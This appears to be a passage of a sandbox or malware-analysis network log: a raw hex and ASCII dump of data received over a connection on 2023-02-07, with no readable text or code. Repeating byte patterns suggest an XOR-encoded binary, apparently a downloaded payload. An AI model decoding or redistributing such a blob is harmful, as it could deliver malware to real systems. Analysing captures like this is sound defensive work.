                                                                                    2023-02-07 18:45:46 UTC708INData Raw: 2b 2c 5e 0d 87 95 a7 6a a8 d2 00 32 62 af ef 68 ed ab 21 e8 68 80 69 06 ec 2b 81 25 ce 4c c5 21 ec d0 49 32 6c 28 98 94 b1 1a 44 3d 75 1e c8 17 f8 42 c2 08 59 02 59 07 b4 6a 60 ad b1 7c ea 27 4f c5 06 73 a7 d4 5d c1 be 63 e7 93 2e 5a a8 28 89 de 43 5d 71 f0 ef 15 99 96 7a 0c a1 ea 27 23 19 6f 14 97 eb 9a a3 6e eb ad e4 c4 fa 88 71 e7 25 be 72 6b a7 0c 42 12 66 58 dc 32 c8 2e eb 62 c8 80 8f 01 99 56 2f 6d 1f c4 06 c2 37 f4 98 48 9c aa 17 af 6b ab 64 2e 4b 83 08 c5 fd d9 e7 a7 80 10 47 b9 a0 e6 5b 14 bb 36 dd 8c 75 41 01 67 a8 ee 1b b8 4d c0 eb 37 94 ba 0c 15 aa 4f c6 04 49 46 0c 5b 57 e6 74 b9 2a 87 49 e4 52 01 bd ee 6c 47 1d b8 2c 06 c8 e3 18 75 bc 89 70 e7 6e a1 21 28 6e eb eb 20 2d c7 0e cf c2 05 4c 43 64 6f 09 fa 50 09 33 5c 08 f3 c4 c4 6b 3b 6b a7 91
                                                                                    Data Ascii: +,^j2bh!hi+%L!I2l(D=uBYYj`|'Os]c.Z(C]qz'#onq%rkBfX2.bV/m7Hkd.KG[6uAgM7OIF[Wt*IRlG,upn!(n -LCdoP3\k;k
                                                                                    2023-02-07 18:45:46 UTC714INData Raw: 41 5f bb a4 2d 17 8a 76 62 96 02 f2 64 a3 e3 ed 1d 19 64 69 d7 22 05 30 ff f1 2d 64 16 74 4f e0 5e 90 1e 1d 2d fb 33 b9 65 fc c1 0c 9b 56 6f 13 fa 11 f4 6e 38 27 d6 44 2c f3 47 f3 b0 44 d9 37 54 f3 a9 e4 2e 3d 1f 0c 37 b9 0e 1c d1 a5 26 71 b8 1a cf 9b b4 94 12 7a 7a 45 88 4c 7c b8 88 cb 7e df 85 8d d1 59 da 8e 72 56 ee 53 b4 9a 01 ff 08 21 ca bc 28 38 55 16 ea e7 10 28 be 9a 55 d9 57 95 17 b5 f9 14 8c bc 7b 23 8e fe 0c ea f9 cb 27 b3 b1 69 29 4d 52 3b 70 82 1a 01 7f b3 84 2f 29 6a e7 6b d9 d7 54 8b 36 1a e8 21 51 69 a6 ea 1f 03 32 cf 5a b7 45 62 e4 c4 88 eb ff 5b 1f 91 a6 d9 0b b4 07 17 28 ba 2a a6 ec 96 50 aa 8f 05 69 d3 57 68 9b 84 79 e7 1a a3 50 4b f5 f8 ca af 99 2d f6 88 0e 14 c5 5c 6a 93 93 7c 87 5c 1e e7 93 68 91 68 91 cf 36 5e 49 a5 9d 83 52 1e 45
                                                                                    Data Ascii: A_-vbddi"0-dtO^-3eVon8'D,GD7T.=7&qzzEL|~YrVS!(8U(UW{#'i)MR;p/)jkT6!Qi2ZEb[(*PiWhyPK-\j|\hh6^IRE
                                                                                    2023-02-07 18:45:46 UTC719INData Raw: fe 16 83 50 cd 2b ee 15 f3 2f 80 d4 91 d6 b1 63 89 1d 02 f5 1e c1 1c cd 98 c4 78 23 2c a1 ef 04 48 f3 fa ac 6c 22 e6 a8 64 32 fe 82 e4 b1 9d 89 46 eb 27 72 37 f2 5c 83 17 80 fe e1 ef 5c bd a6 89 55 c4 d1 95 5f 72 2a 8e 57 ba 59 86 e8 63 4e a2 4f c4 29 de 07 f3 a2 56 0f f3 ab 0e 33 fe c3 57 3b 2f ca 8b cf 2e 13 ee 3c f8 6b ea 16 69 69 22 3f f3 28 a5 81 9d 0b b0 0f 68 6f 47 e2 a0 9f 38 4f 48 ee f0 db d0 4e 54 df 47 32 ad 58 a2 57 6b a1 a0 6a 47 bf b8 4a d0 f9 a8 29 b6 d1 58 95 a7 6a ef a9 67 29 2f 8c 42 d0 bb 40 2d 3f 76 bb 77 e7 6b 29 c3 8f 1c 77 8d e1 a7 2c 65 02 08 ee f0 7a a2 3b f3 e7 6d 29 2f da b5 35 de 2e ef e9 e4 a8 63 ef f8 77 ee 23 a6 2e ab a9 e7 49 78 6c 96 6a a7 ee e3 a5 2c a1 17 6a 4a 87 59 75 c6 26 97 c9 08 d2 11 eb 41 8f dc e5 a5 15 e5 22 39
                                                                                    Data Ascii: P+/cx#,Hl"d2F'r7\\U_r*WYcNO)V3W;/.<kii"?(hoG8OHNTG2XWkjGJ)Xjg)/B@-?vwk)w,ez;m)/5.cw#.Ixlj,jJYu&A"9
                                                                                    2023-02-07 18:45:46 UTC725INData Raw: 5d a1 14 29 2a e3 8b 03 e9 f2 f1 28 24 92 2c 5d 6b ae cf 7a 9c 61 34 3f 65 7e c6 18 11 da e3 2f 23 27 1b 1c e5 a1 e3 20 23 b8 7a e0 fb b3 a7 6a 23 fe 7e ac 2d 3e 76 64 92 92 20 2e 2c 32 30 21 ea f8 cf 2d 49 7b a7 2e 6a b7 f3 ef 19 81 78 61 27 6b 22 71 37 bd df 06 ae 2b 2c 33 31 a5 78 1a bb 13 e6 41 5c f8 68 e3 a1 29 dd 51 67 d8 8b 75 dd 84 01 13 bd 3e 68 7d ae fe 24 03 4f 2c e2 e1 f2 39 68 d7 19 10 59 28 21 7f b0 fe 31 7f 7d e1 c1 83 6c 59 95 e1 e7 e5 c0 96 39 f8 9d 92 b6 ce d0 5a fd d2 c3 0c 75 fe d2 51 67 e5 6a e0 8e 41 84 73 5d eb 93 17 ea a5 81 e7 07 82 24 a3 1c f2 91 61 20 a3 55 d5 dc a4 2e 69 c6 0b c9 41 67 2f 13 0f 3d a1 26 54 99 ef 6a 57 11 13 9d 3b 8c 99 1a f0 c8 82 8e a6 68 28 a6 2e 69 0b 09 21 ed c7 4b 2a 6a e0 bb 5f c8 1c 5d e7 e3 e3 5b 9f 6b
                                                                                    Data Ascii: ])*($,]kza4?e~/#' #zj#~->vd .,20!-I{.jxa'k"q7+,31xA\h)Qgu>h}$O,9hY(!1}lY9ZuQgjAs]$a U.iAg/=&TjW;h(.i!K*j_][k
                                                                                    2023-02-07 18:45:46 UTC736INData Raw: bb 7f 09 fc 7e e6 9f b3 68 f9 ba 8d 48 22 47 2d a0 6a 2e e6 a8 a0 6c e2 64 d2 a0 e0 d6 5c 55 8a 3e ef 94 c5 db f7 c0 2d e5 68 32 35 a5 33 16 62 ee 2d 88 81 85 a6 09 05 63 c9 0c 47 70 ec f9 68 86 67 87 8e ed 70 ff 8d 23 e4 63 43 46 94 de e8 e8 c2 7e b3 9c bf aa bb 02 16 4e 53 63 36 81 85 37 9b e6 bf dc b4 0f 19 ea 2b 70 bc 1f d9 ab 04 80 ab ae e2 eb aa 63 21 c3 ec 68 90 f1 30 96 03 ff 66 b3 ac ca c1 61 cf dc bd 16 b5 d6 9b 34 f9 a2 c7 62 8b ef 4e 87 02 6c 0c a2 01 29 60 ab 09 cf 42 f6 98 dc 97 ad e9 a7 f5 a4 51 ec 64 71 f2 f7 1a e6 a8 c4 8a b8 3c c5 81 2e d4 88 ff ea 71 6e f4 c8 99 3e 18 4e b8 eb 29 ea fa 3c ae 2e 64 8d a1 44 e2 1e 53 47 a3 71 54 67 5b cb 43 21 d0 c5 88 27 18 8c b0 62 e0 d3 49 76 ab 2c 20 24 23 23 0c 4e e1 65 21 67 6e a3 26 c0 81 2b 25 65
                                                                                    Data Ascii: ~hH"G-j.ld\U>-h253b-cGphgp#cCF~NSc67+pc!h0fa4bNl)`BQdq<.qn>N)<.dDSGqTg[C!'bIv, $##Ne!gn&+%e
                                                                                    2023-02-07 18:45:46 UTC741INData Raw: 48 9e a4 1f d3 60 2d e3 be 3b 6c a4 eb 62 40 66 41 91 53 6a d1 0e bf e2 2e 43 07 e9 ad 84 c8 63 77 7a af c8 4b ab a3 a9 a6 28 86 cb 65 68 ed a1 cf 80 d3 d7 84 83 9a d4 87 84 f1 37 6e a5 7a f5 e6 a6 6a 0a 04 11 46 04 d2 60 6f bb 3b a5 c5 a1 40 27 a3 6e e5 67 29 fb 3b a5 05 86 ba 84 5a aa e4 b3 2c cb 12 e5 64 6c 2b 29 83 3f 58 4e 60 dd c1 6b 48 36 66 7b 1f cf 48 4d 65 ba fc 72 f6 a8 57 31 ce a8 cf 8f fc 37 3a 35 f9 a3 a4 6b b8 a9 2e 84 cb 71 7c 6a 6d 12 de 38 76 8a 78 bf 05 50 54 a6 0a 6a cd 56 99 d1 17 2a 84 61 b8 56 64 29 6c ac 02 09 d4 de a8 fd 32 2b 9c 11 e3 1b d5 5e 54 43 5c c0 9f 74 80 fb 8f 20 05 ed 15 9e 4f a3 77 fa 2e d7 4e fe 02 45 69 27 47 38 19 6c a4 a0 24 a9 ac e9 45 fb 97 33 c2 19 b8 7a a8 74 1c c1 86 35 c8 ba 19 04 37 6b 06 ca a6 fa 28 71 6b
                                                                                    Data Ascii: H`-;lb@fASj.CcwzK(eh7nzjF`o;@'ng);Z,dl+)?XN`kH6f{HMerW17:5k.q|jm8vxPTjV*aVd)l2+^TC\t Ow.NEi'G8l$E3zt57k(qk
                                                                                    2023-02-07 18:45:46 UTC747INData Raw: 8a a5 f9 f7 84 c1 6e 34 db 12 ba fd 36 8d e7 6e 87 79 94 d7 aa 8c e2 8b 75 dc f3 91 41 cb 06 24 d2 11 aa 69 a4 c8 c5 4c 93 a5 83 eb 74 93 d8 ed 5f 15 b9 a0 d4 7a 4b 2a f9 90 1a bc 62 20 5c 5c 6f 0b c1 1c d7 1e ca 48 53 d0 f0 5d 02 c2 dc c0 2f 59 cc b3 2f e2 64 aa 02 cb 64 6f a6 f8 c5 9a 97 2f d4 aa 62 99 02 ef 0f dc 96 15 66 a8 5a 10 a3 15 fc ae ee 8e 69 f3 be e9 3d 21 ec fd 61 21 89 97 74 82 30 14 59 6a 9e af 94 5a ef dd 9b 42 4b 24 8d 4f e0 bb ad 68 fa 10 26 68 93 af 3e 15 cd 45 8a e2 ec 63 a3 4f 02 6c fc 79 a5 3e da 48 b1 7d ed fb 7e e6 2a ab 17 51 17 91 db 17 24 20 66 9d 88 89 5b d0 de e5 d5 97 54 42 98 33 05 39 10 53 e1 ea 9b 78 89 1f 25 d5 8c c6 68 26 66 a1 e0 23 ec a4 22 32 3c 34 9a 82 67 ae ef 45 03 2c 54 47 b0 a9 e1 4f cf e7 28 fc 49 a8 1b fa 93
                                                                                    Data Ascii: n46nyuA$iLt_zK*b \\oHS]/Y/ddo/bfZi=!a!t0YjZBK$Oh&h>EcOly>H}~*Q$ f[TB39Sx%h&f#"2<4gE,TGO(I
                                                                                    2023-02-07 18:45:46 UTC752INData Raw: 0b 72 a7 4a 04 11 5e 1e f5 ed 99 e2 9a 41 7f c6 d8 5a 44 c7 c9 c8 5c dc 83 81 77 8d 12 26 33 0b a2 6b 1a 25 31 0a 94 8b 8a 80 52 08 48 66 a0 08 55 d4 6c a5 2b a9 65 6b 48 53 59 9b 94 bf 68 20 bc 1d b1 82 a1 ad 71 6a db c9 87 f6 b8 21 cf 90 1f a8 b6 40 37 9d db 4b 83 ee a6 b4 4d f5 0f 10 a0 e1 c7 5b 6b 40 d6 db 4d 58 0d 1a 60 ad ae 82 45 82 02 34 bb 54 ae 5c ae 6f b7 77 81 08 8c d8 3e af 27 e3 db c2 b7 68 6e 23 e6 0b 91 ac b5 88 43 24 64 e5 62 5d 15 2c b5 6a bb 61 e8 a9 68 3e 9f 12 1c 9d 53 f5 74 ca 2c 43 05 86 83 fe 03 07 0b 27 df e1 e0 3e 06 69 d2 0f ad 33 d1 60 42 e8 8b 2e 4e c3 a4 db 51 42 b2 5c 3e aa e3 69 92 41 39 ee 38 10 53 b6 64 f8 28 ac 6a 65 11 98 eb 5a 1c 09 07 c1 04 30 5d a9 bb 5b 55 65 bd b4 d0 25 b2 7e 96 74 ec 3f d8 a9 f5 38 6d ab 33 5a 80
                                                                                    Data Ascii: rJ^AZD\w&3k%1RHfUl+ekHSYh qj!@7KM[k@MX`E4T\ow>'hn#C$db],jah>St,C'>i3`B.NQB\>iA98Sd(jeZ0][Ue%~t?8m3Z
                                                                                    2023-02-07 18:45:46 UTC758INData Raw: 8b 22 01 b2 7f aa a6 48 ba 56 86 91 0d 3a 4f a8 8c 01 c4 99 5d 6b cc f3 64 83 7e 6b 87 b2 1c 29 c0 a5 ef b8 56 e5 9a 38 a7 ac 42 0e e4 55 b6 83 a7 8a 0c 23 45 10 be 0d 09 e4 c5 ee 88 2f eb 8e 50 fd 33 9e be 72 d1 b7 ff f9 5d a2 07 b2 47 12 2a 82 43 8f 8d 5f ba 8d d6 9a 36 ab 76 db 25 38 f5 00 aa a4 dd ef f1 0c d0 aa 45 36 ee 6d 54 cb d7 06 61 19 16 a8 2d 6b e4 2d 62 e5 62 85 d3 52 8b 5d 54 6a 44 01 66 a0 e0 23 ca 71 5a a3 2b 26 6a 7a f1 0a 83 3a be 18 62 e7 f9 48 1f cd b8 2d 6c 2e 60 78 4c 99 d8 9b 2f dc de b8 a6 32 6c 29 a7 bb b7 3b a2 ff 65 20 62 6b 0f b6 3e 7a bf 38 5d d9 1b 65 77 ba 5a 1a f7 52 d3 9b 06 bb 4a 26 d3 26 c4 80 4b c6 1a 03 32 a9 75 b9 a5 0a ac 49 3e bf 5b da 9f 43 de 0e 68 29 d6 d7 4a 7e 9b e1 12 80 72 fb f6 e2 2f e1 c4 e2 d4 30 dd af 01
                                                                                    Data Ascii: "HV:O]kd~k)V8BU#E/P3r]G*C_6v%8E6mTa-k-bbR]TjDf#qZ+&jz:bH-l.`xL/2l);e bk>z8]ewZRJ&&K2uI>[Ch)J~r/0
                                                                                    2023-02-07 18:45:46 UTC763INData Raw: a7 eb 26 63 2c e8 a4 e8 26 68 ab ed 2d e8 c4 89 d0 2e 37 49 cc 83 d2 01 b9 6a a8 a4 de f3 f2 37 c7 a3 2d e0 71 d6 53 f0 e3 b8 b9 67 a6 40 82 8f 5f b8 64 62 a3 a5 64 65 ea 67 6b c8 7b 0a 3c 91 a7 97 e1 29 2b a0 b6 b3 2c 6e e0 79 b4 7b bf ab 28 24 ef e1 70 12 bb 1a 64 95 f7 4e e7 62 64 9d ff 06 a7 a1 64 ee 43 17 39 65 a7 66 ac 89 8f e9 dd 92 d2 0b 3f a6 18 95 66 b2 c8 05 57 78 ad 64 a6 9d 68 ad 85 08 d3 b5 47 89 a2 aa 88 6b 85 4b a4 69 ab 4e 4f a1 ec 79 f5 2b eb 46 6f 93 58 7b a7 1e ec 72 fc 0a 7b bd 6e 0a e4 e8 fa bf 6b 8e dc b1 20 a1 23 ab 72 f4 41 0e 33 ca f7 6e d0 3c ac a0 b5 f8 af a9 d5 7b ad 65 ca e1 5c 9b a6 89 7c d9 e7 56 81 3a ef a3 d8 95 d8 6a 7b 81 4c b2 5c 61 63 2c 62 02 b3 da 1a 5f a6 ba 7f eb af c7 74 5d 26 3a c3 3e 6f 47 62 61 47 96 76 84 8a
                                                                                    Data Ascii: &c,&h-.7Ij7-qSg@_dbdegk{<)+,ny{($pdNbddC9ef?fWxdhGkKiNOy+FoX{r{nk #rA3n<{e\|V:j{L\ac,b_t]&:>oGbaGv
                                                                                    2023-02-07 18:45:46 UTC769INData Raw: 05 48 4f 19 ce 9a ed 52 11 e4 4f 81 ad 21 ec 93 1f 1a d6 69 02 0d 2b 02 cb ca db f8 03 a3 0d a8 61 5f cc 4d 49 6c 18 f9 18 2d 43 dc 76 0b 98 e7 74 ea 44 4a 97 2e e0 12 2f f8 d5 06 a8 1e f2 ca 5e dc 81 2f 13 51 ae c5 07 df 33 bf a3 9e c3 a5 2c 2a ff f9 7c 3e 28 e9 44 91 ba 2b 66 a9 09 8a e1 34 34 e1 f1 38 28 ef 56 80 31 f4 fa 2a a7 2e 68 9d ff ce 2c 3d 94 25 94 59 c1 5c d8 96 52 20 5b ef 02 23 1a 4c c1 ee 78 d9 83 44 8c 57 e6 7e 02 b5 2d 2d 14 d5 b8 f7 6e 35 8d e9 5a 0c bb 1b f6 c5 6a 8d a0 77 6b 0a f8 a9 ac d4 84 07 d8 70 c2 37 80 f3 3c 41 14 f2 47 2c a9 eb 67 99 cd 32 6f 27 82 ea eb af 24 08 ef 47 ee 5e 1b c5 8c 3e f2 e3 ec e7 e9 e5 64 6f 66 9a b7 11 6a 3f 14 57 32 e8 a6 00 58 27 c8 46 65 e0 2e ea 1e a0 2f 02 34 d3 6d e3 d4 68 2c d3 ad 50 ba 94 56 98 4d
                                                                                    Data Ascii: HORO!i+a_MIl-CvtDJ./^/Q3,*|>(D+f448(V1*.h,=%Y\R [#LxDW~--n5Zjwkp7<AG,g2o'$G^>dofj?W2X'Fe./4mh,PVM
                                                                                    2023-02-07 18:45:46 UTC774INData Raw: 64 8c 82 a5 69 c8 9e f0 64 73 7d a9 f2 a9 f2 b5 79 d4 a2 d0 64 53 5d a9 71 14 cc b5 79 d4 b2 c0 64 43 4d a9 11 1f 66 be b3 f8 7e 20 66 21 2d a9 51 5f 68 a4 19 bf 5b fc 64 7f 79 dd ae dc 64 5f 51 ad f6 f1 aa b5 79 c0 aa cc 64 4f 41 a9 09 6c cc ab 67 f0 7a 2c 66 2d 21 a9 49 47 68 b0 b3 d4 86 f4 64 77 79 a9 39 37 78 b4 19 7f b3 d4 64 57 59 a9 79 77 78 b4 19 7b 9c ff 64 47 49 a9 19 17 66 65 69 aa 29 b1 32 aa e9 e4 64 94 9e d1 89 fb 64 78 1b 07 58 d6 e4 a1 6d d4 a9 db 64 58 56 ad f6 ff a4 bd 71 80 ed cb 64 48 46 a9 07 9c 32 ab a7 ab 67 eb e6 aa e6 eb 64 8a ef 01 60 ac 45 10 3e a9 bd b3 64 fa f4 e5 3d 7e 19 6c 1e a9 9d 93 64 ba b4 85 49 d4 b2 69 0e a9 8d 83 64 da d4 ab 67 80 05 56 d2 ab ef e3 64 9a 94 a5 69 d8 81 ff 64 69 b2 7f b7 72 ad 69 b5 7e 75 7e 19 60 12
                                                                                    Data Ascii: dids}ydS]qydCMf~ f!-Q_h[dyd_QydOAlgz,f-!IGhdwy97xdWYywx{dGIfei)2ddxXmdXVqdHF2gd`E>d=~ldIidgVdidiri~u~`
                                                                                    2023-02-07 18:45:46 UTC780INData Raw: 97 4e fa ba 07 16 11 77 77 21 b7 21 0d f7 76 fb 7d c0 d0 f4 ed 98 3b 39 9d af 9d 31 67 5e ab e5 17 69 0d ea 87 31 e6 27 f7 06 40 21 d8 a4 cc c7 a8 93 6a c8 38 cb 81 05 48 fc 27 0d b2 0d 11 d9 c2 3a b7 d6 52 62 5c 1b 22 55 fa 00 a7 50 02 82 d7 67 a4 8d 47 3f 4f 40 37 08 e9 48 cd f9 df 9c bd ce 79 93 2d 96 92 5e 5d a1 34 58 72 03 b8 be 02 34 1e b1 92 6c f5 7c e2 5b 53 74 18 aa 65 a0 68 9d c3 af f8 c5 28 62 88 f2 8e 42 58 b9 9e 08 28 8e 38 07 b8 d6 d3 ca c8 e1 75 c2 32 10 43 16 42 27 e5 19 d2 7f 0e d4 a2 48 a8 d2 8d ea 24 34 fd dd 82 3b 6d 85 69 f6 1d b2 cf fe e7 43 f9 2a 97 74 5f 25 07 2c b4 e8 77 1b 12 f3 f2 1e ea 71 82 29 4c 7e 12 71 a7 b3 62 46 01 bb 98 b7 37 6f e8 80 91 60 78 d8 7a ad 08 ef dc ab 27 4d 50 4d 57 7a f6 42 c7 22 1d 8f b7 15 bb 87 4d e4 8d
                                                                                    Data Ascii: Nww!!v};91g^i1'@!j8H':Rb\"UPgG?O@7Hy-^]4Xr4l|[Steh(bBX(8u2CB'H$4;miC*t_%,wq)L~qbF7o`xz'MPMWzB"M
                                                                                    2023-02-07 18:45:46 UTC785INData Raw: 0c df 78 ab 39 35 66 f4 f8 ab f9 f5 66 c1 52 f5 66 b4 b8 ab 79 75 66 54 58 ab 0c ff 58 ab 19 15 66 d4 d8 ab d9 d5 66 41 f2 d5 66 94 98 ab 59 55 66 6b a7 c2 08 6d e7 ea 67 4a 47 aa c7 ca 67 c0 1d ba 67 3a 37 aa 97 9a 67 1a 17 aa 0d c8 6f aa ef e2 67 42 4f aa cf c2 67 c0 15 b2 67 32 3f aa 9f 92 67 12 1f aa 0d c4 63 aa e3 ee 67 4e 43 aa c3 ce 67 c0 19 be 67 3e 33 aa 93 9e 67 1e 13 aa 0d c3 64 22 ac 29 67 29 24 aa 64 69 67 c0 2e 89 67 c9 c4 aa c4 c9 67 89 84 aa 07 ca a7 6f a2 7a 77 aa af a2 67 c0 15 b2 67 6e 63 aa b3 be 67 66 6b aa 0d dc 7b aa a5 a8 67 78 75 aa ad a0 67 c0 17 b0 67 6c 61 aa b1 bc 67 64 69 aa 0d de 79 aa a6 ab 67 7b 76 aa ae a3 67 c0 14 b3 67 6f c2 0a b2 1f c7 67 ca 0a 0d dd da 0a a4 09 c7 79 d4 0a ac 01 c7 40 96 11 c7 6d c0 0a b0 1d c7 5a 66
                                                                                    Data Ascii: x95ffRfyufTXXffAfYUfkmgJGgg:7gogBOgg2?gcgNCgg>3gd")g)$dig.ggozwggncgfk{gxugglagdiyg{vggogy@mZf
                                                                                    2023-02-07 18:45:46 UTC791INData Raw: 21 ed 05 2b a1 88 2b 60 a7 6c a0 6a 26 a2 ff 7a a7 69 a2 6c a1 6e b5 7e b3 3f a7 6a e7 6e a6 5f a2 5a a5 38 76 ce aa 62 bf 02 af 35 a0 62 af 5d a0 6a c0 6d f0 4d 87 6a 87 6a 8f e2 25 68 af 6a cf 62 af 0a a7 6a a7 12 af 08 cd 12 a7 62 a8 ed 2d 67 a0 62 ff 32 a7 62 a7 ea 22 6f a7 72 b8 2d e7 42 e1 71 be 6a cf 2e cf 77 12 be 86 9f 92 b3 43 df 9b 44 38 cc e5 3b 22 eb 2e 56 97 ed 1c 16 62 d7 4e fb 62 ab a3 af 62 6a 62 a3 ab af 6a f3 36 af 72 7a 62 8b 83 af 4e 46 62 93 f6 07 62 6f b4 be 73 6d 73 af ba b2 62 c1 2d 8e 62 4f 47 af 8e 86 62 47 4f af 0c f0 53 af 92 9a 62 53 5b af 9a 92 62 c1 4d ee 62 2f 27 af ee e6 62 3b 33 af cc 58 3b af c2 ca 62 07 0f af 63 b8 c4 4b 36 ad d8 d2 62 ef e7 af 36 3e 62 cb 52 fb 62 c3 cb af 1e 16 62 af a7 af 6e 77 b6 af 76 7e 62 8b 83
                                                                                    Data Ascii: !++`lj&ziln~?jn_Z8vb5b]jmMjj%hjbjb-gb2b"or-Bqj.wCD8;".VbNbbjbj6rzbNFbbosmsb-bOGbGOSbS[bMb/'b;3X;bcK6b6>bRbbnwv~b
                                                                                    2023-02-07 18:45:46 UTC796INData Raw: ac 17 46 ca 01 54 01 d5 67 8b 17 1f b4 23 da 89 a7 d1 5f 88 e6 8b 87 ab c1 4c e7 8b 67 22 2d 3d 50 2a 45 0d e1 e8 e5 8b af f2 26 96 a8 88 27 eb 1e 76 22 aa 47 8b 7f d0 80 2e 46 7a 0e 57 68 87 e0 8b e7 a9 30 d9 e1 8b af a2 ff 2e 99 88 77 40 fe 61 1e 99 44 c1 67 a9 ef 8b 77 13 3e 54 03 21 46 8a 57 98 45 6a 3d 4a b6 e0 67 8a 36 77 54 b8 ea 8b b7 af f6 af 4b 26 46 ca 76 1f 0d 25 46 62 df 7e 05 4e 45 da b9 43 8f d4 57 8a 66 82 ab ac 78 a7 71 c8 32 99 45 fa e5 5b a6 88 97 76 c8 0b 34 3a 45 29 d3 fc e7 88 c7 e1 08 2e 15 39 47 7b e5 67 1a 88 47 0e 4b bf f8 88 f7 0a 8c c2 f5 89 2d 02 ef ba 3d 88 97 89 a1 5d 45 7a 17 65 3a ec f2 89 75 84 16 f4 54 88 87 cb cd 63 45 5a e0 5a f1 99 04 4b e6 e8 e6 88 e7 aa d9 85 55 89 33 a7 48 3d 43 9f 0a 83 32 a9 45 da ca b9 1e 3c 47
                                                                                    Data Ascii: FTg#_Lg"-=P*E&'v"G.FzWh0.w@aDgw>T!FWEj=Jg6wTK&Fv%Fb~NECWfxq2E[v4:E).9G{gGK-=]Eze:uTcEZZKU3H=C2E<G
                                                                                    2023-02-07 18:45:46 UTC802INData Raw: c2 0f cb 06 a7 6a a7 6a c2 0f c9 04 a7 6a a7 6a c2 0f d4 19 a7 6a a7 6a c1 0c ce 03 a7 6a a7 6a c1 0c d5 18 a7 6a a7 6a cf 02 c2 0f a7 6a a7 6a cf 02 d2 1f a7 6a a7 6a ce 03 d4 19 a7 6a a7 6a ce 03 d3 1e a7 6a a7 6a cd 00 c6 0b a7 6a a7 6a cc 01 c8 05 a7 6a a7 6a c9 04 cb 06 a7 6a a7 6a c9 04 c8 05 a7 6a a7 6a d7 1a cb 06 a7 6a a7 6a d7 1a d3 1e a7 6a a7 6a d5 18 c8 05 a7 6a a7 6a d5 18 d2 1f a7 6a a7 6a cf 02 d5 18 a7 6a a7 6a d4 19 cc 01 a7 6a a7 6a d4 19 d6 1b a7 6a a7 6a d4 19 d1 1c a7 6a a7 6a d3 1e cf 02 a7 6a a7 6a d3 1e d5 18 a7 6a a7 6a d2 1f d5 18 a7 6a a7 6a ce 03 c3 0e a7 6a a7 6a d2 1f cc 01 a7 6a a7 6a c5 08 c2 0f a7 6a a7 6a d4 19 cb 06 a7 6a a7 6a c2 0f d3 1e a7 6a a7 6a cb 06 d1 1c a7 6a a7 6a cb 06 d3 1e a7 6a a7 6a c1 0c c6 0b a7 6a a7
                                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
                                                                                    2023-02-07 18:45:46 UTC807INData Raw: a4 2d e3 69 c0 5f f6 69 20 ee a4 bd 73 69 00 ce a4 9d 7e 47 a4 4d 99 77 f3 6d f3 69 20 88 e0 4b 14 be c7 6e 50 fd c3 6e 70 92 86 60 3b 35 f5 f3 ab 2c 82 78 b0 0b d7 73 fd 6b bb 20 af 6a ca 6b 20 ed f5 5d a5 5f 90 61 89 4b ab 62 89 44 bb 92 21 b5 5b f3 1f ed a2 ad 33 3d 3f 41 d3 67 6d de 70 57 f9 ee d8 ac 9a e6 18 90 a8 ac 2f c1 83 e9 90 1d 63 ee f0 1c c8 a0 27 ec 35 2d 48 56 33 fd 73 39 23 e2 2d da 17 ea f5 39 fe 33 f4 39 a7 3e f3 2f e2 27 ea 36 bb 2a e4 29 d2 1f d5 98 27 0f 92 3a c9 04 d3 9e 21 03 4a eb d6 48 f7 05 c8 06 4b f8 d0 8f 2e 3f fa e9 26 1b d5 1c d1 03 ce 09 94 3a c2 0f d4 99 3d 55 00 ea f5 7e e3 0b 46 f6 da 0b ca 87 2d 14 a6 9f 26 19 55 e0 ad ea 31 bf 4b 82 4b 24 59 b1 fe 36 fd 31 23 8f 00 a7 e8 da d3 99 d9 e6 29 d1 09 ff 53 35 07 69 5b f5 55
                                                                                    Data Ascii: -i_i si~GMwmi KnPnp`;5,xsk jk ]_aKbD![3=?AgmpW/c'5-HV3s9#-939>/'6*)':!JHK.?&:=U~F-&U1KK$Y61#)S5i[U
                                                                                    2023-02-07 18:45:46 UTC813INData Raw: a2 ee 6b 97 97 a7 ab aa 62 3a 53 c9 84 fa 1a 47 a7 99 34 0a a1 a8 07 09 49 82 bf 5a 87 63 bc 71 d3 2f 96 71 d8 3e 97 71 bc 6b 8c 40 a8 95 5a 87 4c 6e 28 43 6f 03 4e f3 bd 00 9b 71 88 ca 97 d5 88 6a 51 fc c7 6a 6f c6 df 77 4e 83 bf 5d 82 61 87 3e c8 71 a7 4a e3 14 bd 4a b3 47 be 6a 87 4b b2 7e b3 8e 45 6c 53 9a 53 86 3f 9a d6 7a b6 79 e4 2a b7 98 4c 53 9f 02 c5 49 d6 23 b6 62 be 93 7d 5e 49 b0 97 60 d3 10 a9 6e c7 1a b3 ba 82 3f 7a f5 25 0a cf e6 48 88 4f 89 20 ef 1f 34 ae 85 20 ec 23 16 a1 7d af 75 b8 5e 9d 64 b6 09 d8 97 5c 61 47 83 6e ad d0 1c c1 92 3f e3 2a 6e 47 2a 02 6f 58 2a 18 6a 67 a7 4c 8c c6 0a c7 0b 67 d2 df 0b c6 34 0d 7e 4c 04 c0 89 46 0b 13 f7 ef 6b b6 ce 2e 57 c5 0e 39 12 47 8b 44 c0 eb 8f bd 90 45 88 47 d6 7a d0 9c 8c b9 79 af 48 87 60 ff
                                                                                    Data Ascii: kb:SG4IZcq/q>qk@ZLn(CoNqjQjowN]a>qJJGjK~ElSS?zy*LSI#b}^I`n?z%HO 4 #}u^d\aGn?*nG*oX*jgLg4~LFk.W9GDEGzyH`
                                                                                    2023-02-07 18:45:46 UTC829INData Raw: b2 1a 3d f1 2b b3 fb 0b ad 62 cf f5 3b 0a c2 03 cb 19 a0 6c b9 63 ac 45 e6 2e e3 3e f1 63 cf 64 ba 1a ac cd 2a 4a 81 1b 94 7d a6 19 69 e1 9a 12 f0 3d ce 00 e9 52 be 72 db 0b 8c 51 de ea 48 52 99 67 c3 0f 81 41 ae 79 d5 54 9a 69 eb 49 a9 6f 8f 4f ac 7a 7d a3 b4 61 5e f0 e7 b3 04 3a 56 ee a0 24 6a cb d7 48 ba 66 85 4f c3 0e b1 7d b1 6a d4 6a cf 22 86 2d 93 7d a7 8b 35 7c 87 58 b0 6a 81 1d 9c 83 0c 47 26 eb 25 ab e4 c5 7c 7b 86 47 bc 98 82 cf c8 77 ac 44 f0 6a 64 aa a6 3a 75 52 59 45 a2 63 c2 6a a5 c7 8a a3 83 69 be 72 af 46 ae 44 af 63 ba 75 ab 8a 87 9c f0 6a 98 54 e0 45 a0 60 85 9c 7e 71 a6 6d d2 7f 33 f0 f6 a3 2d 8a 01 41 ba 16 ab 03 44 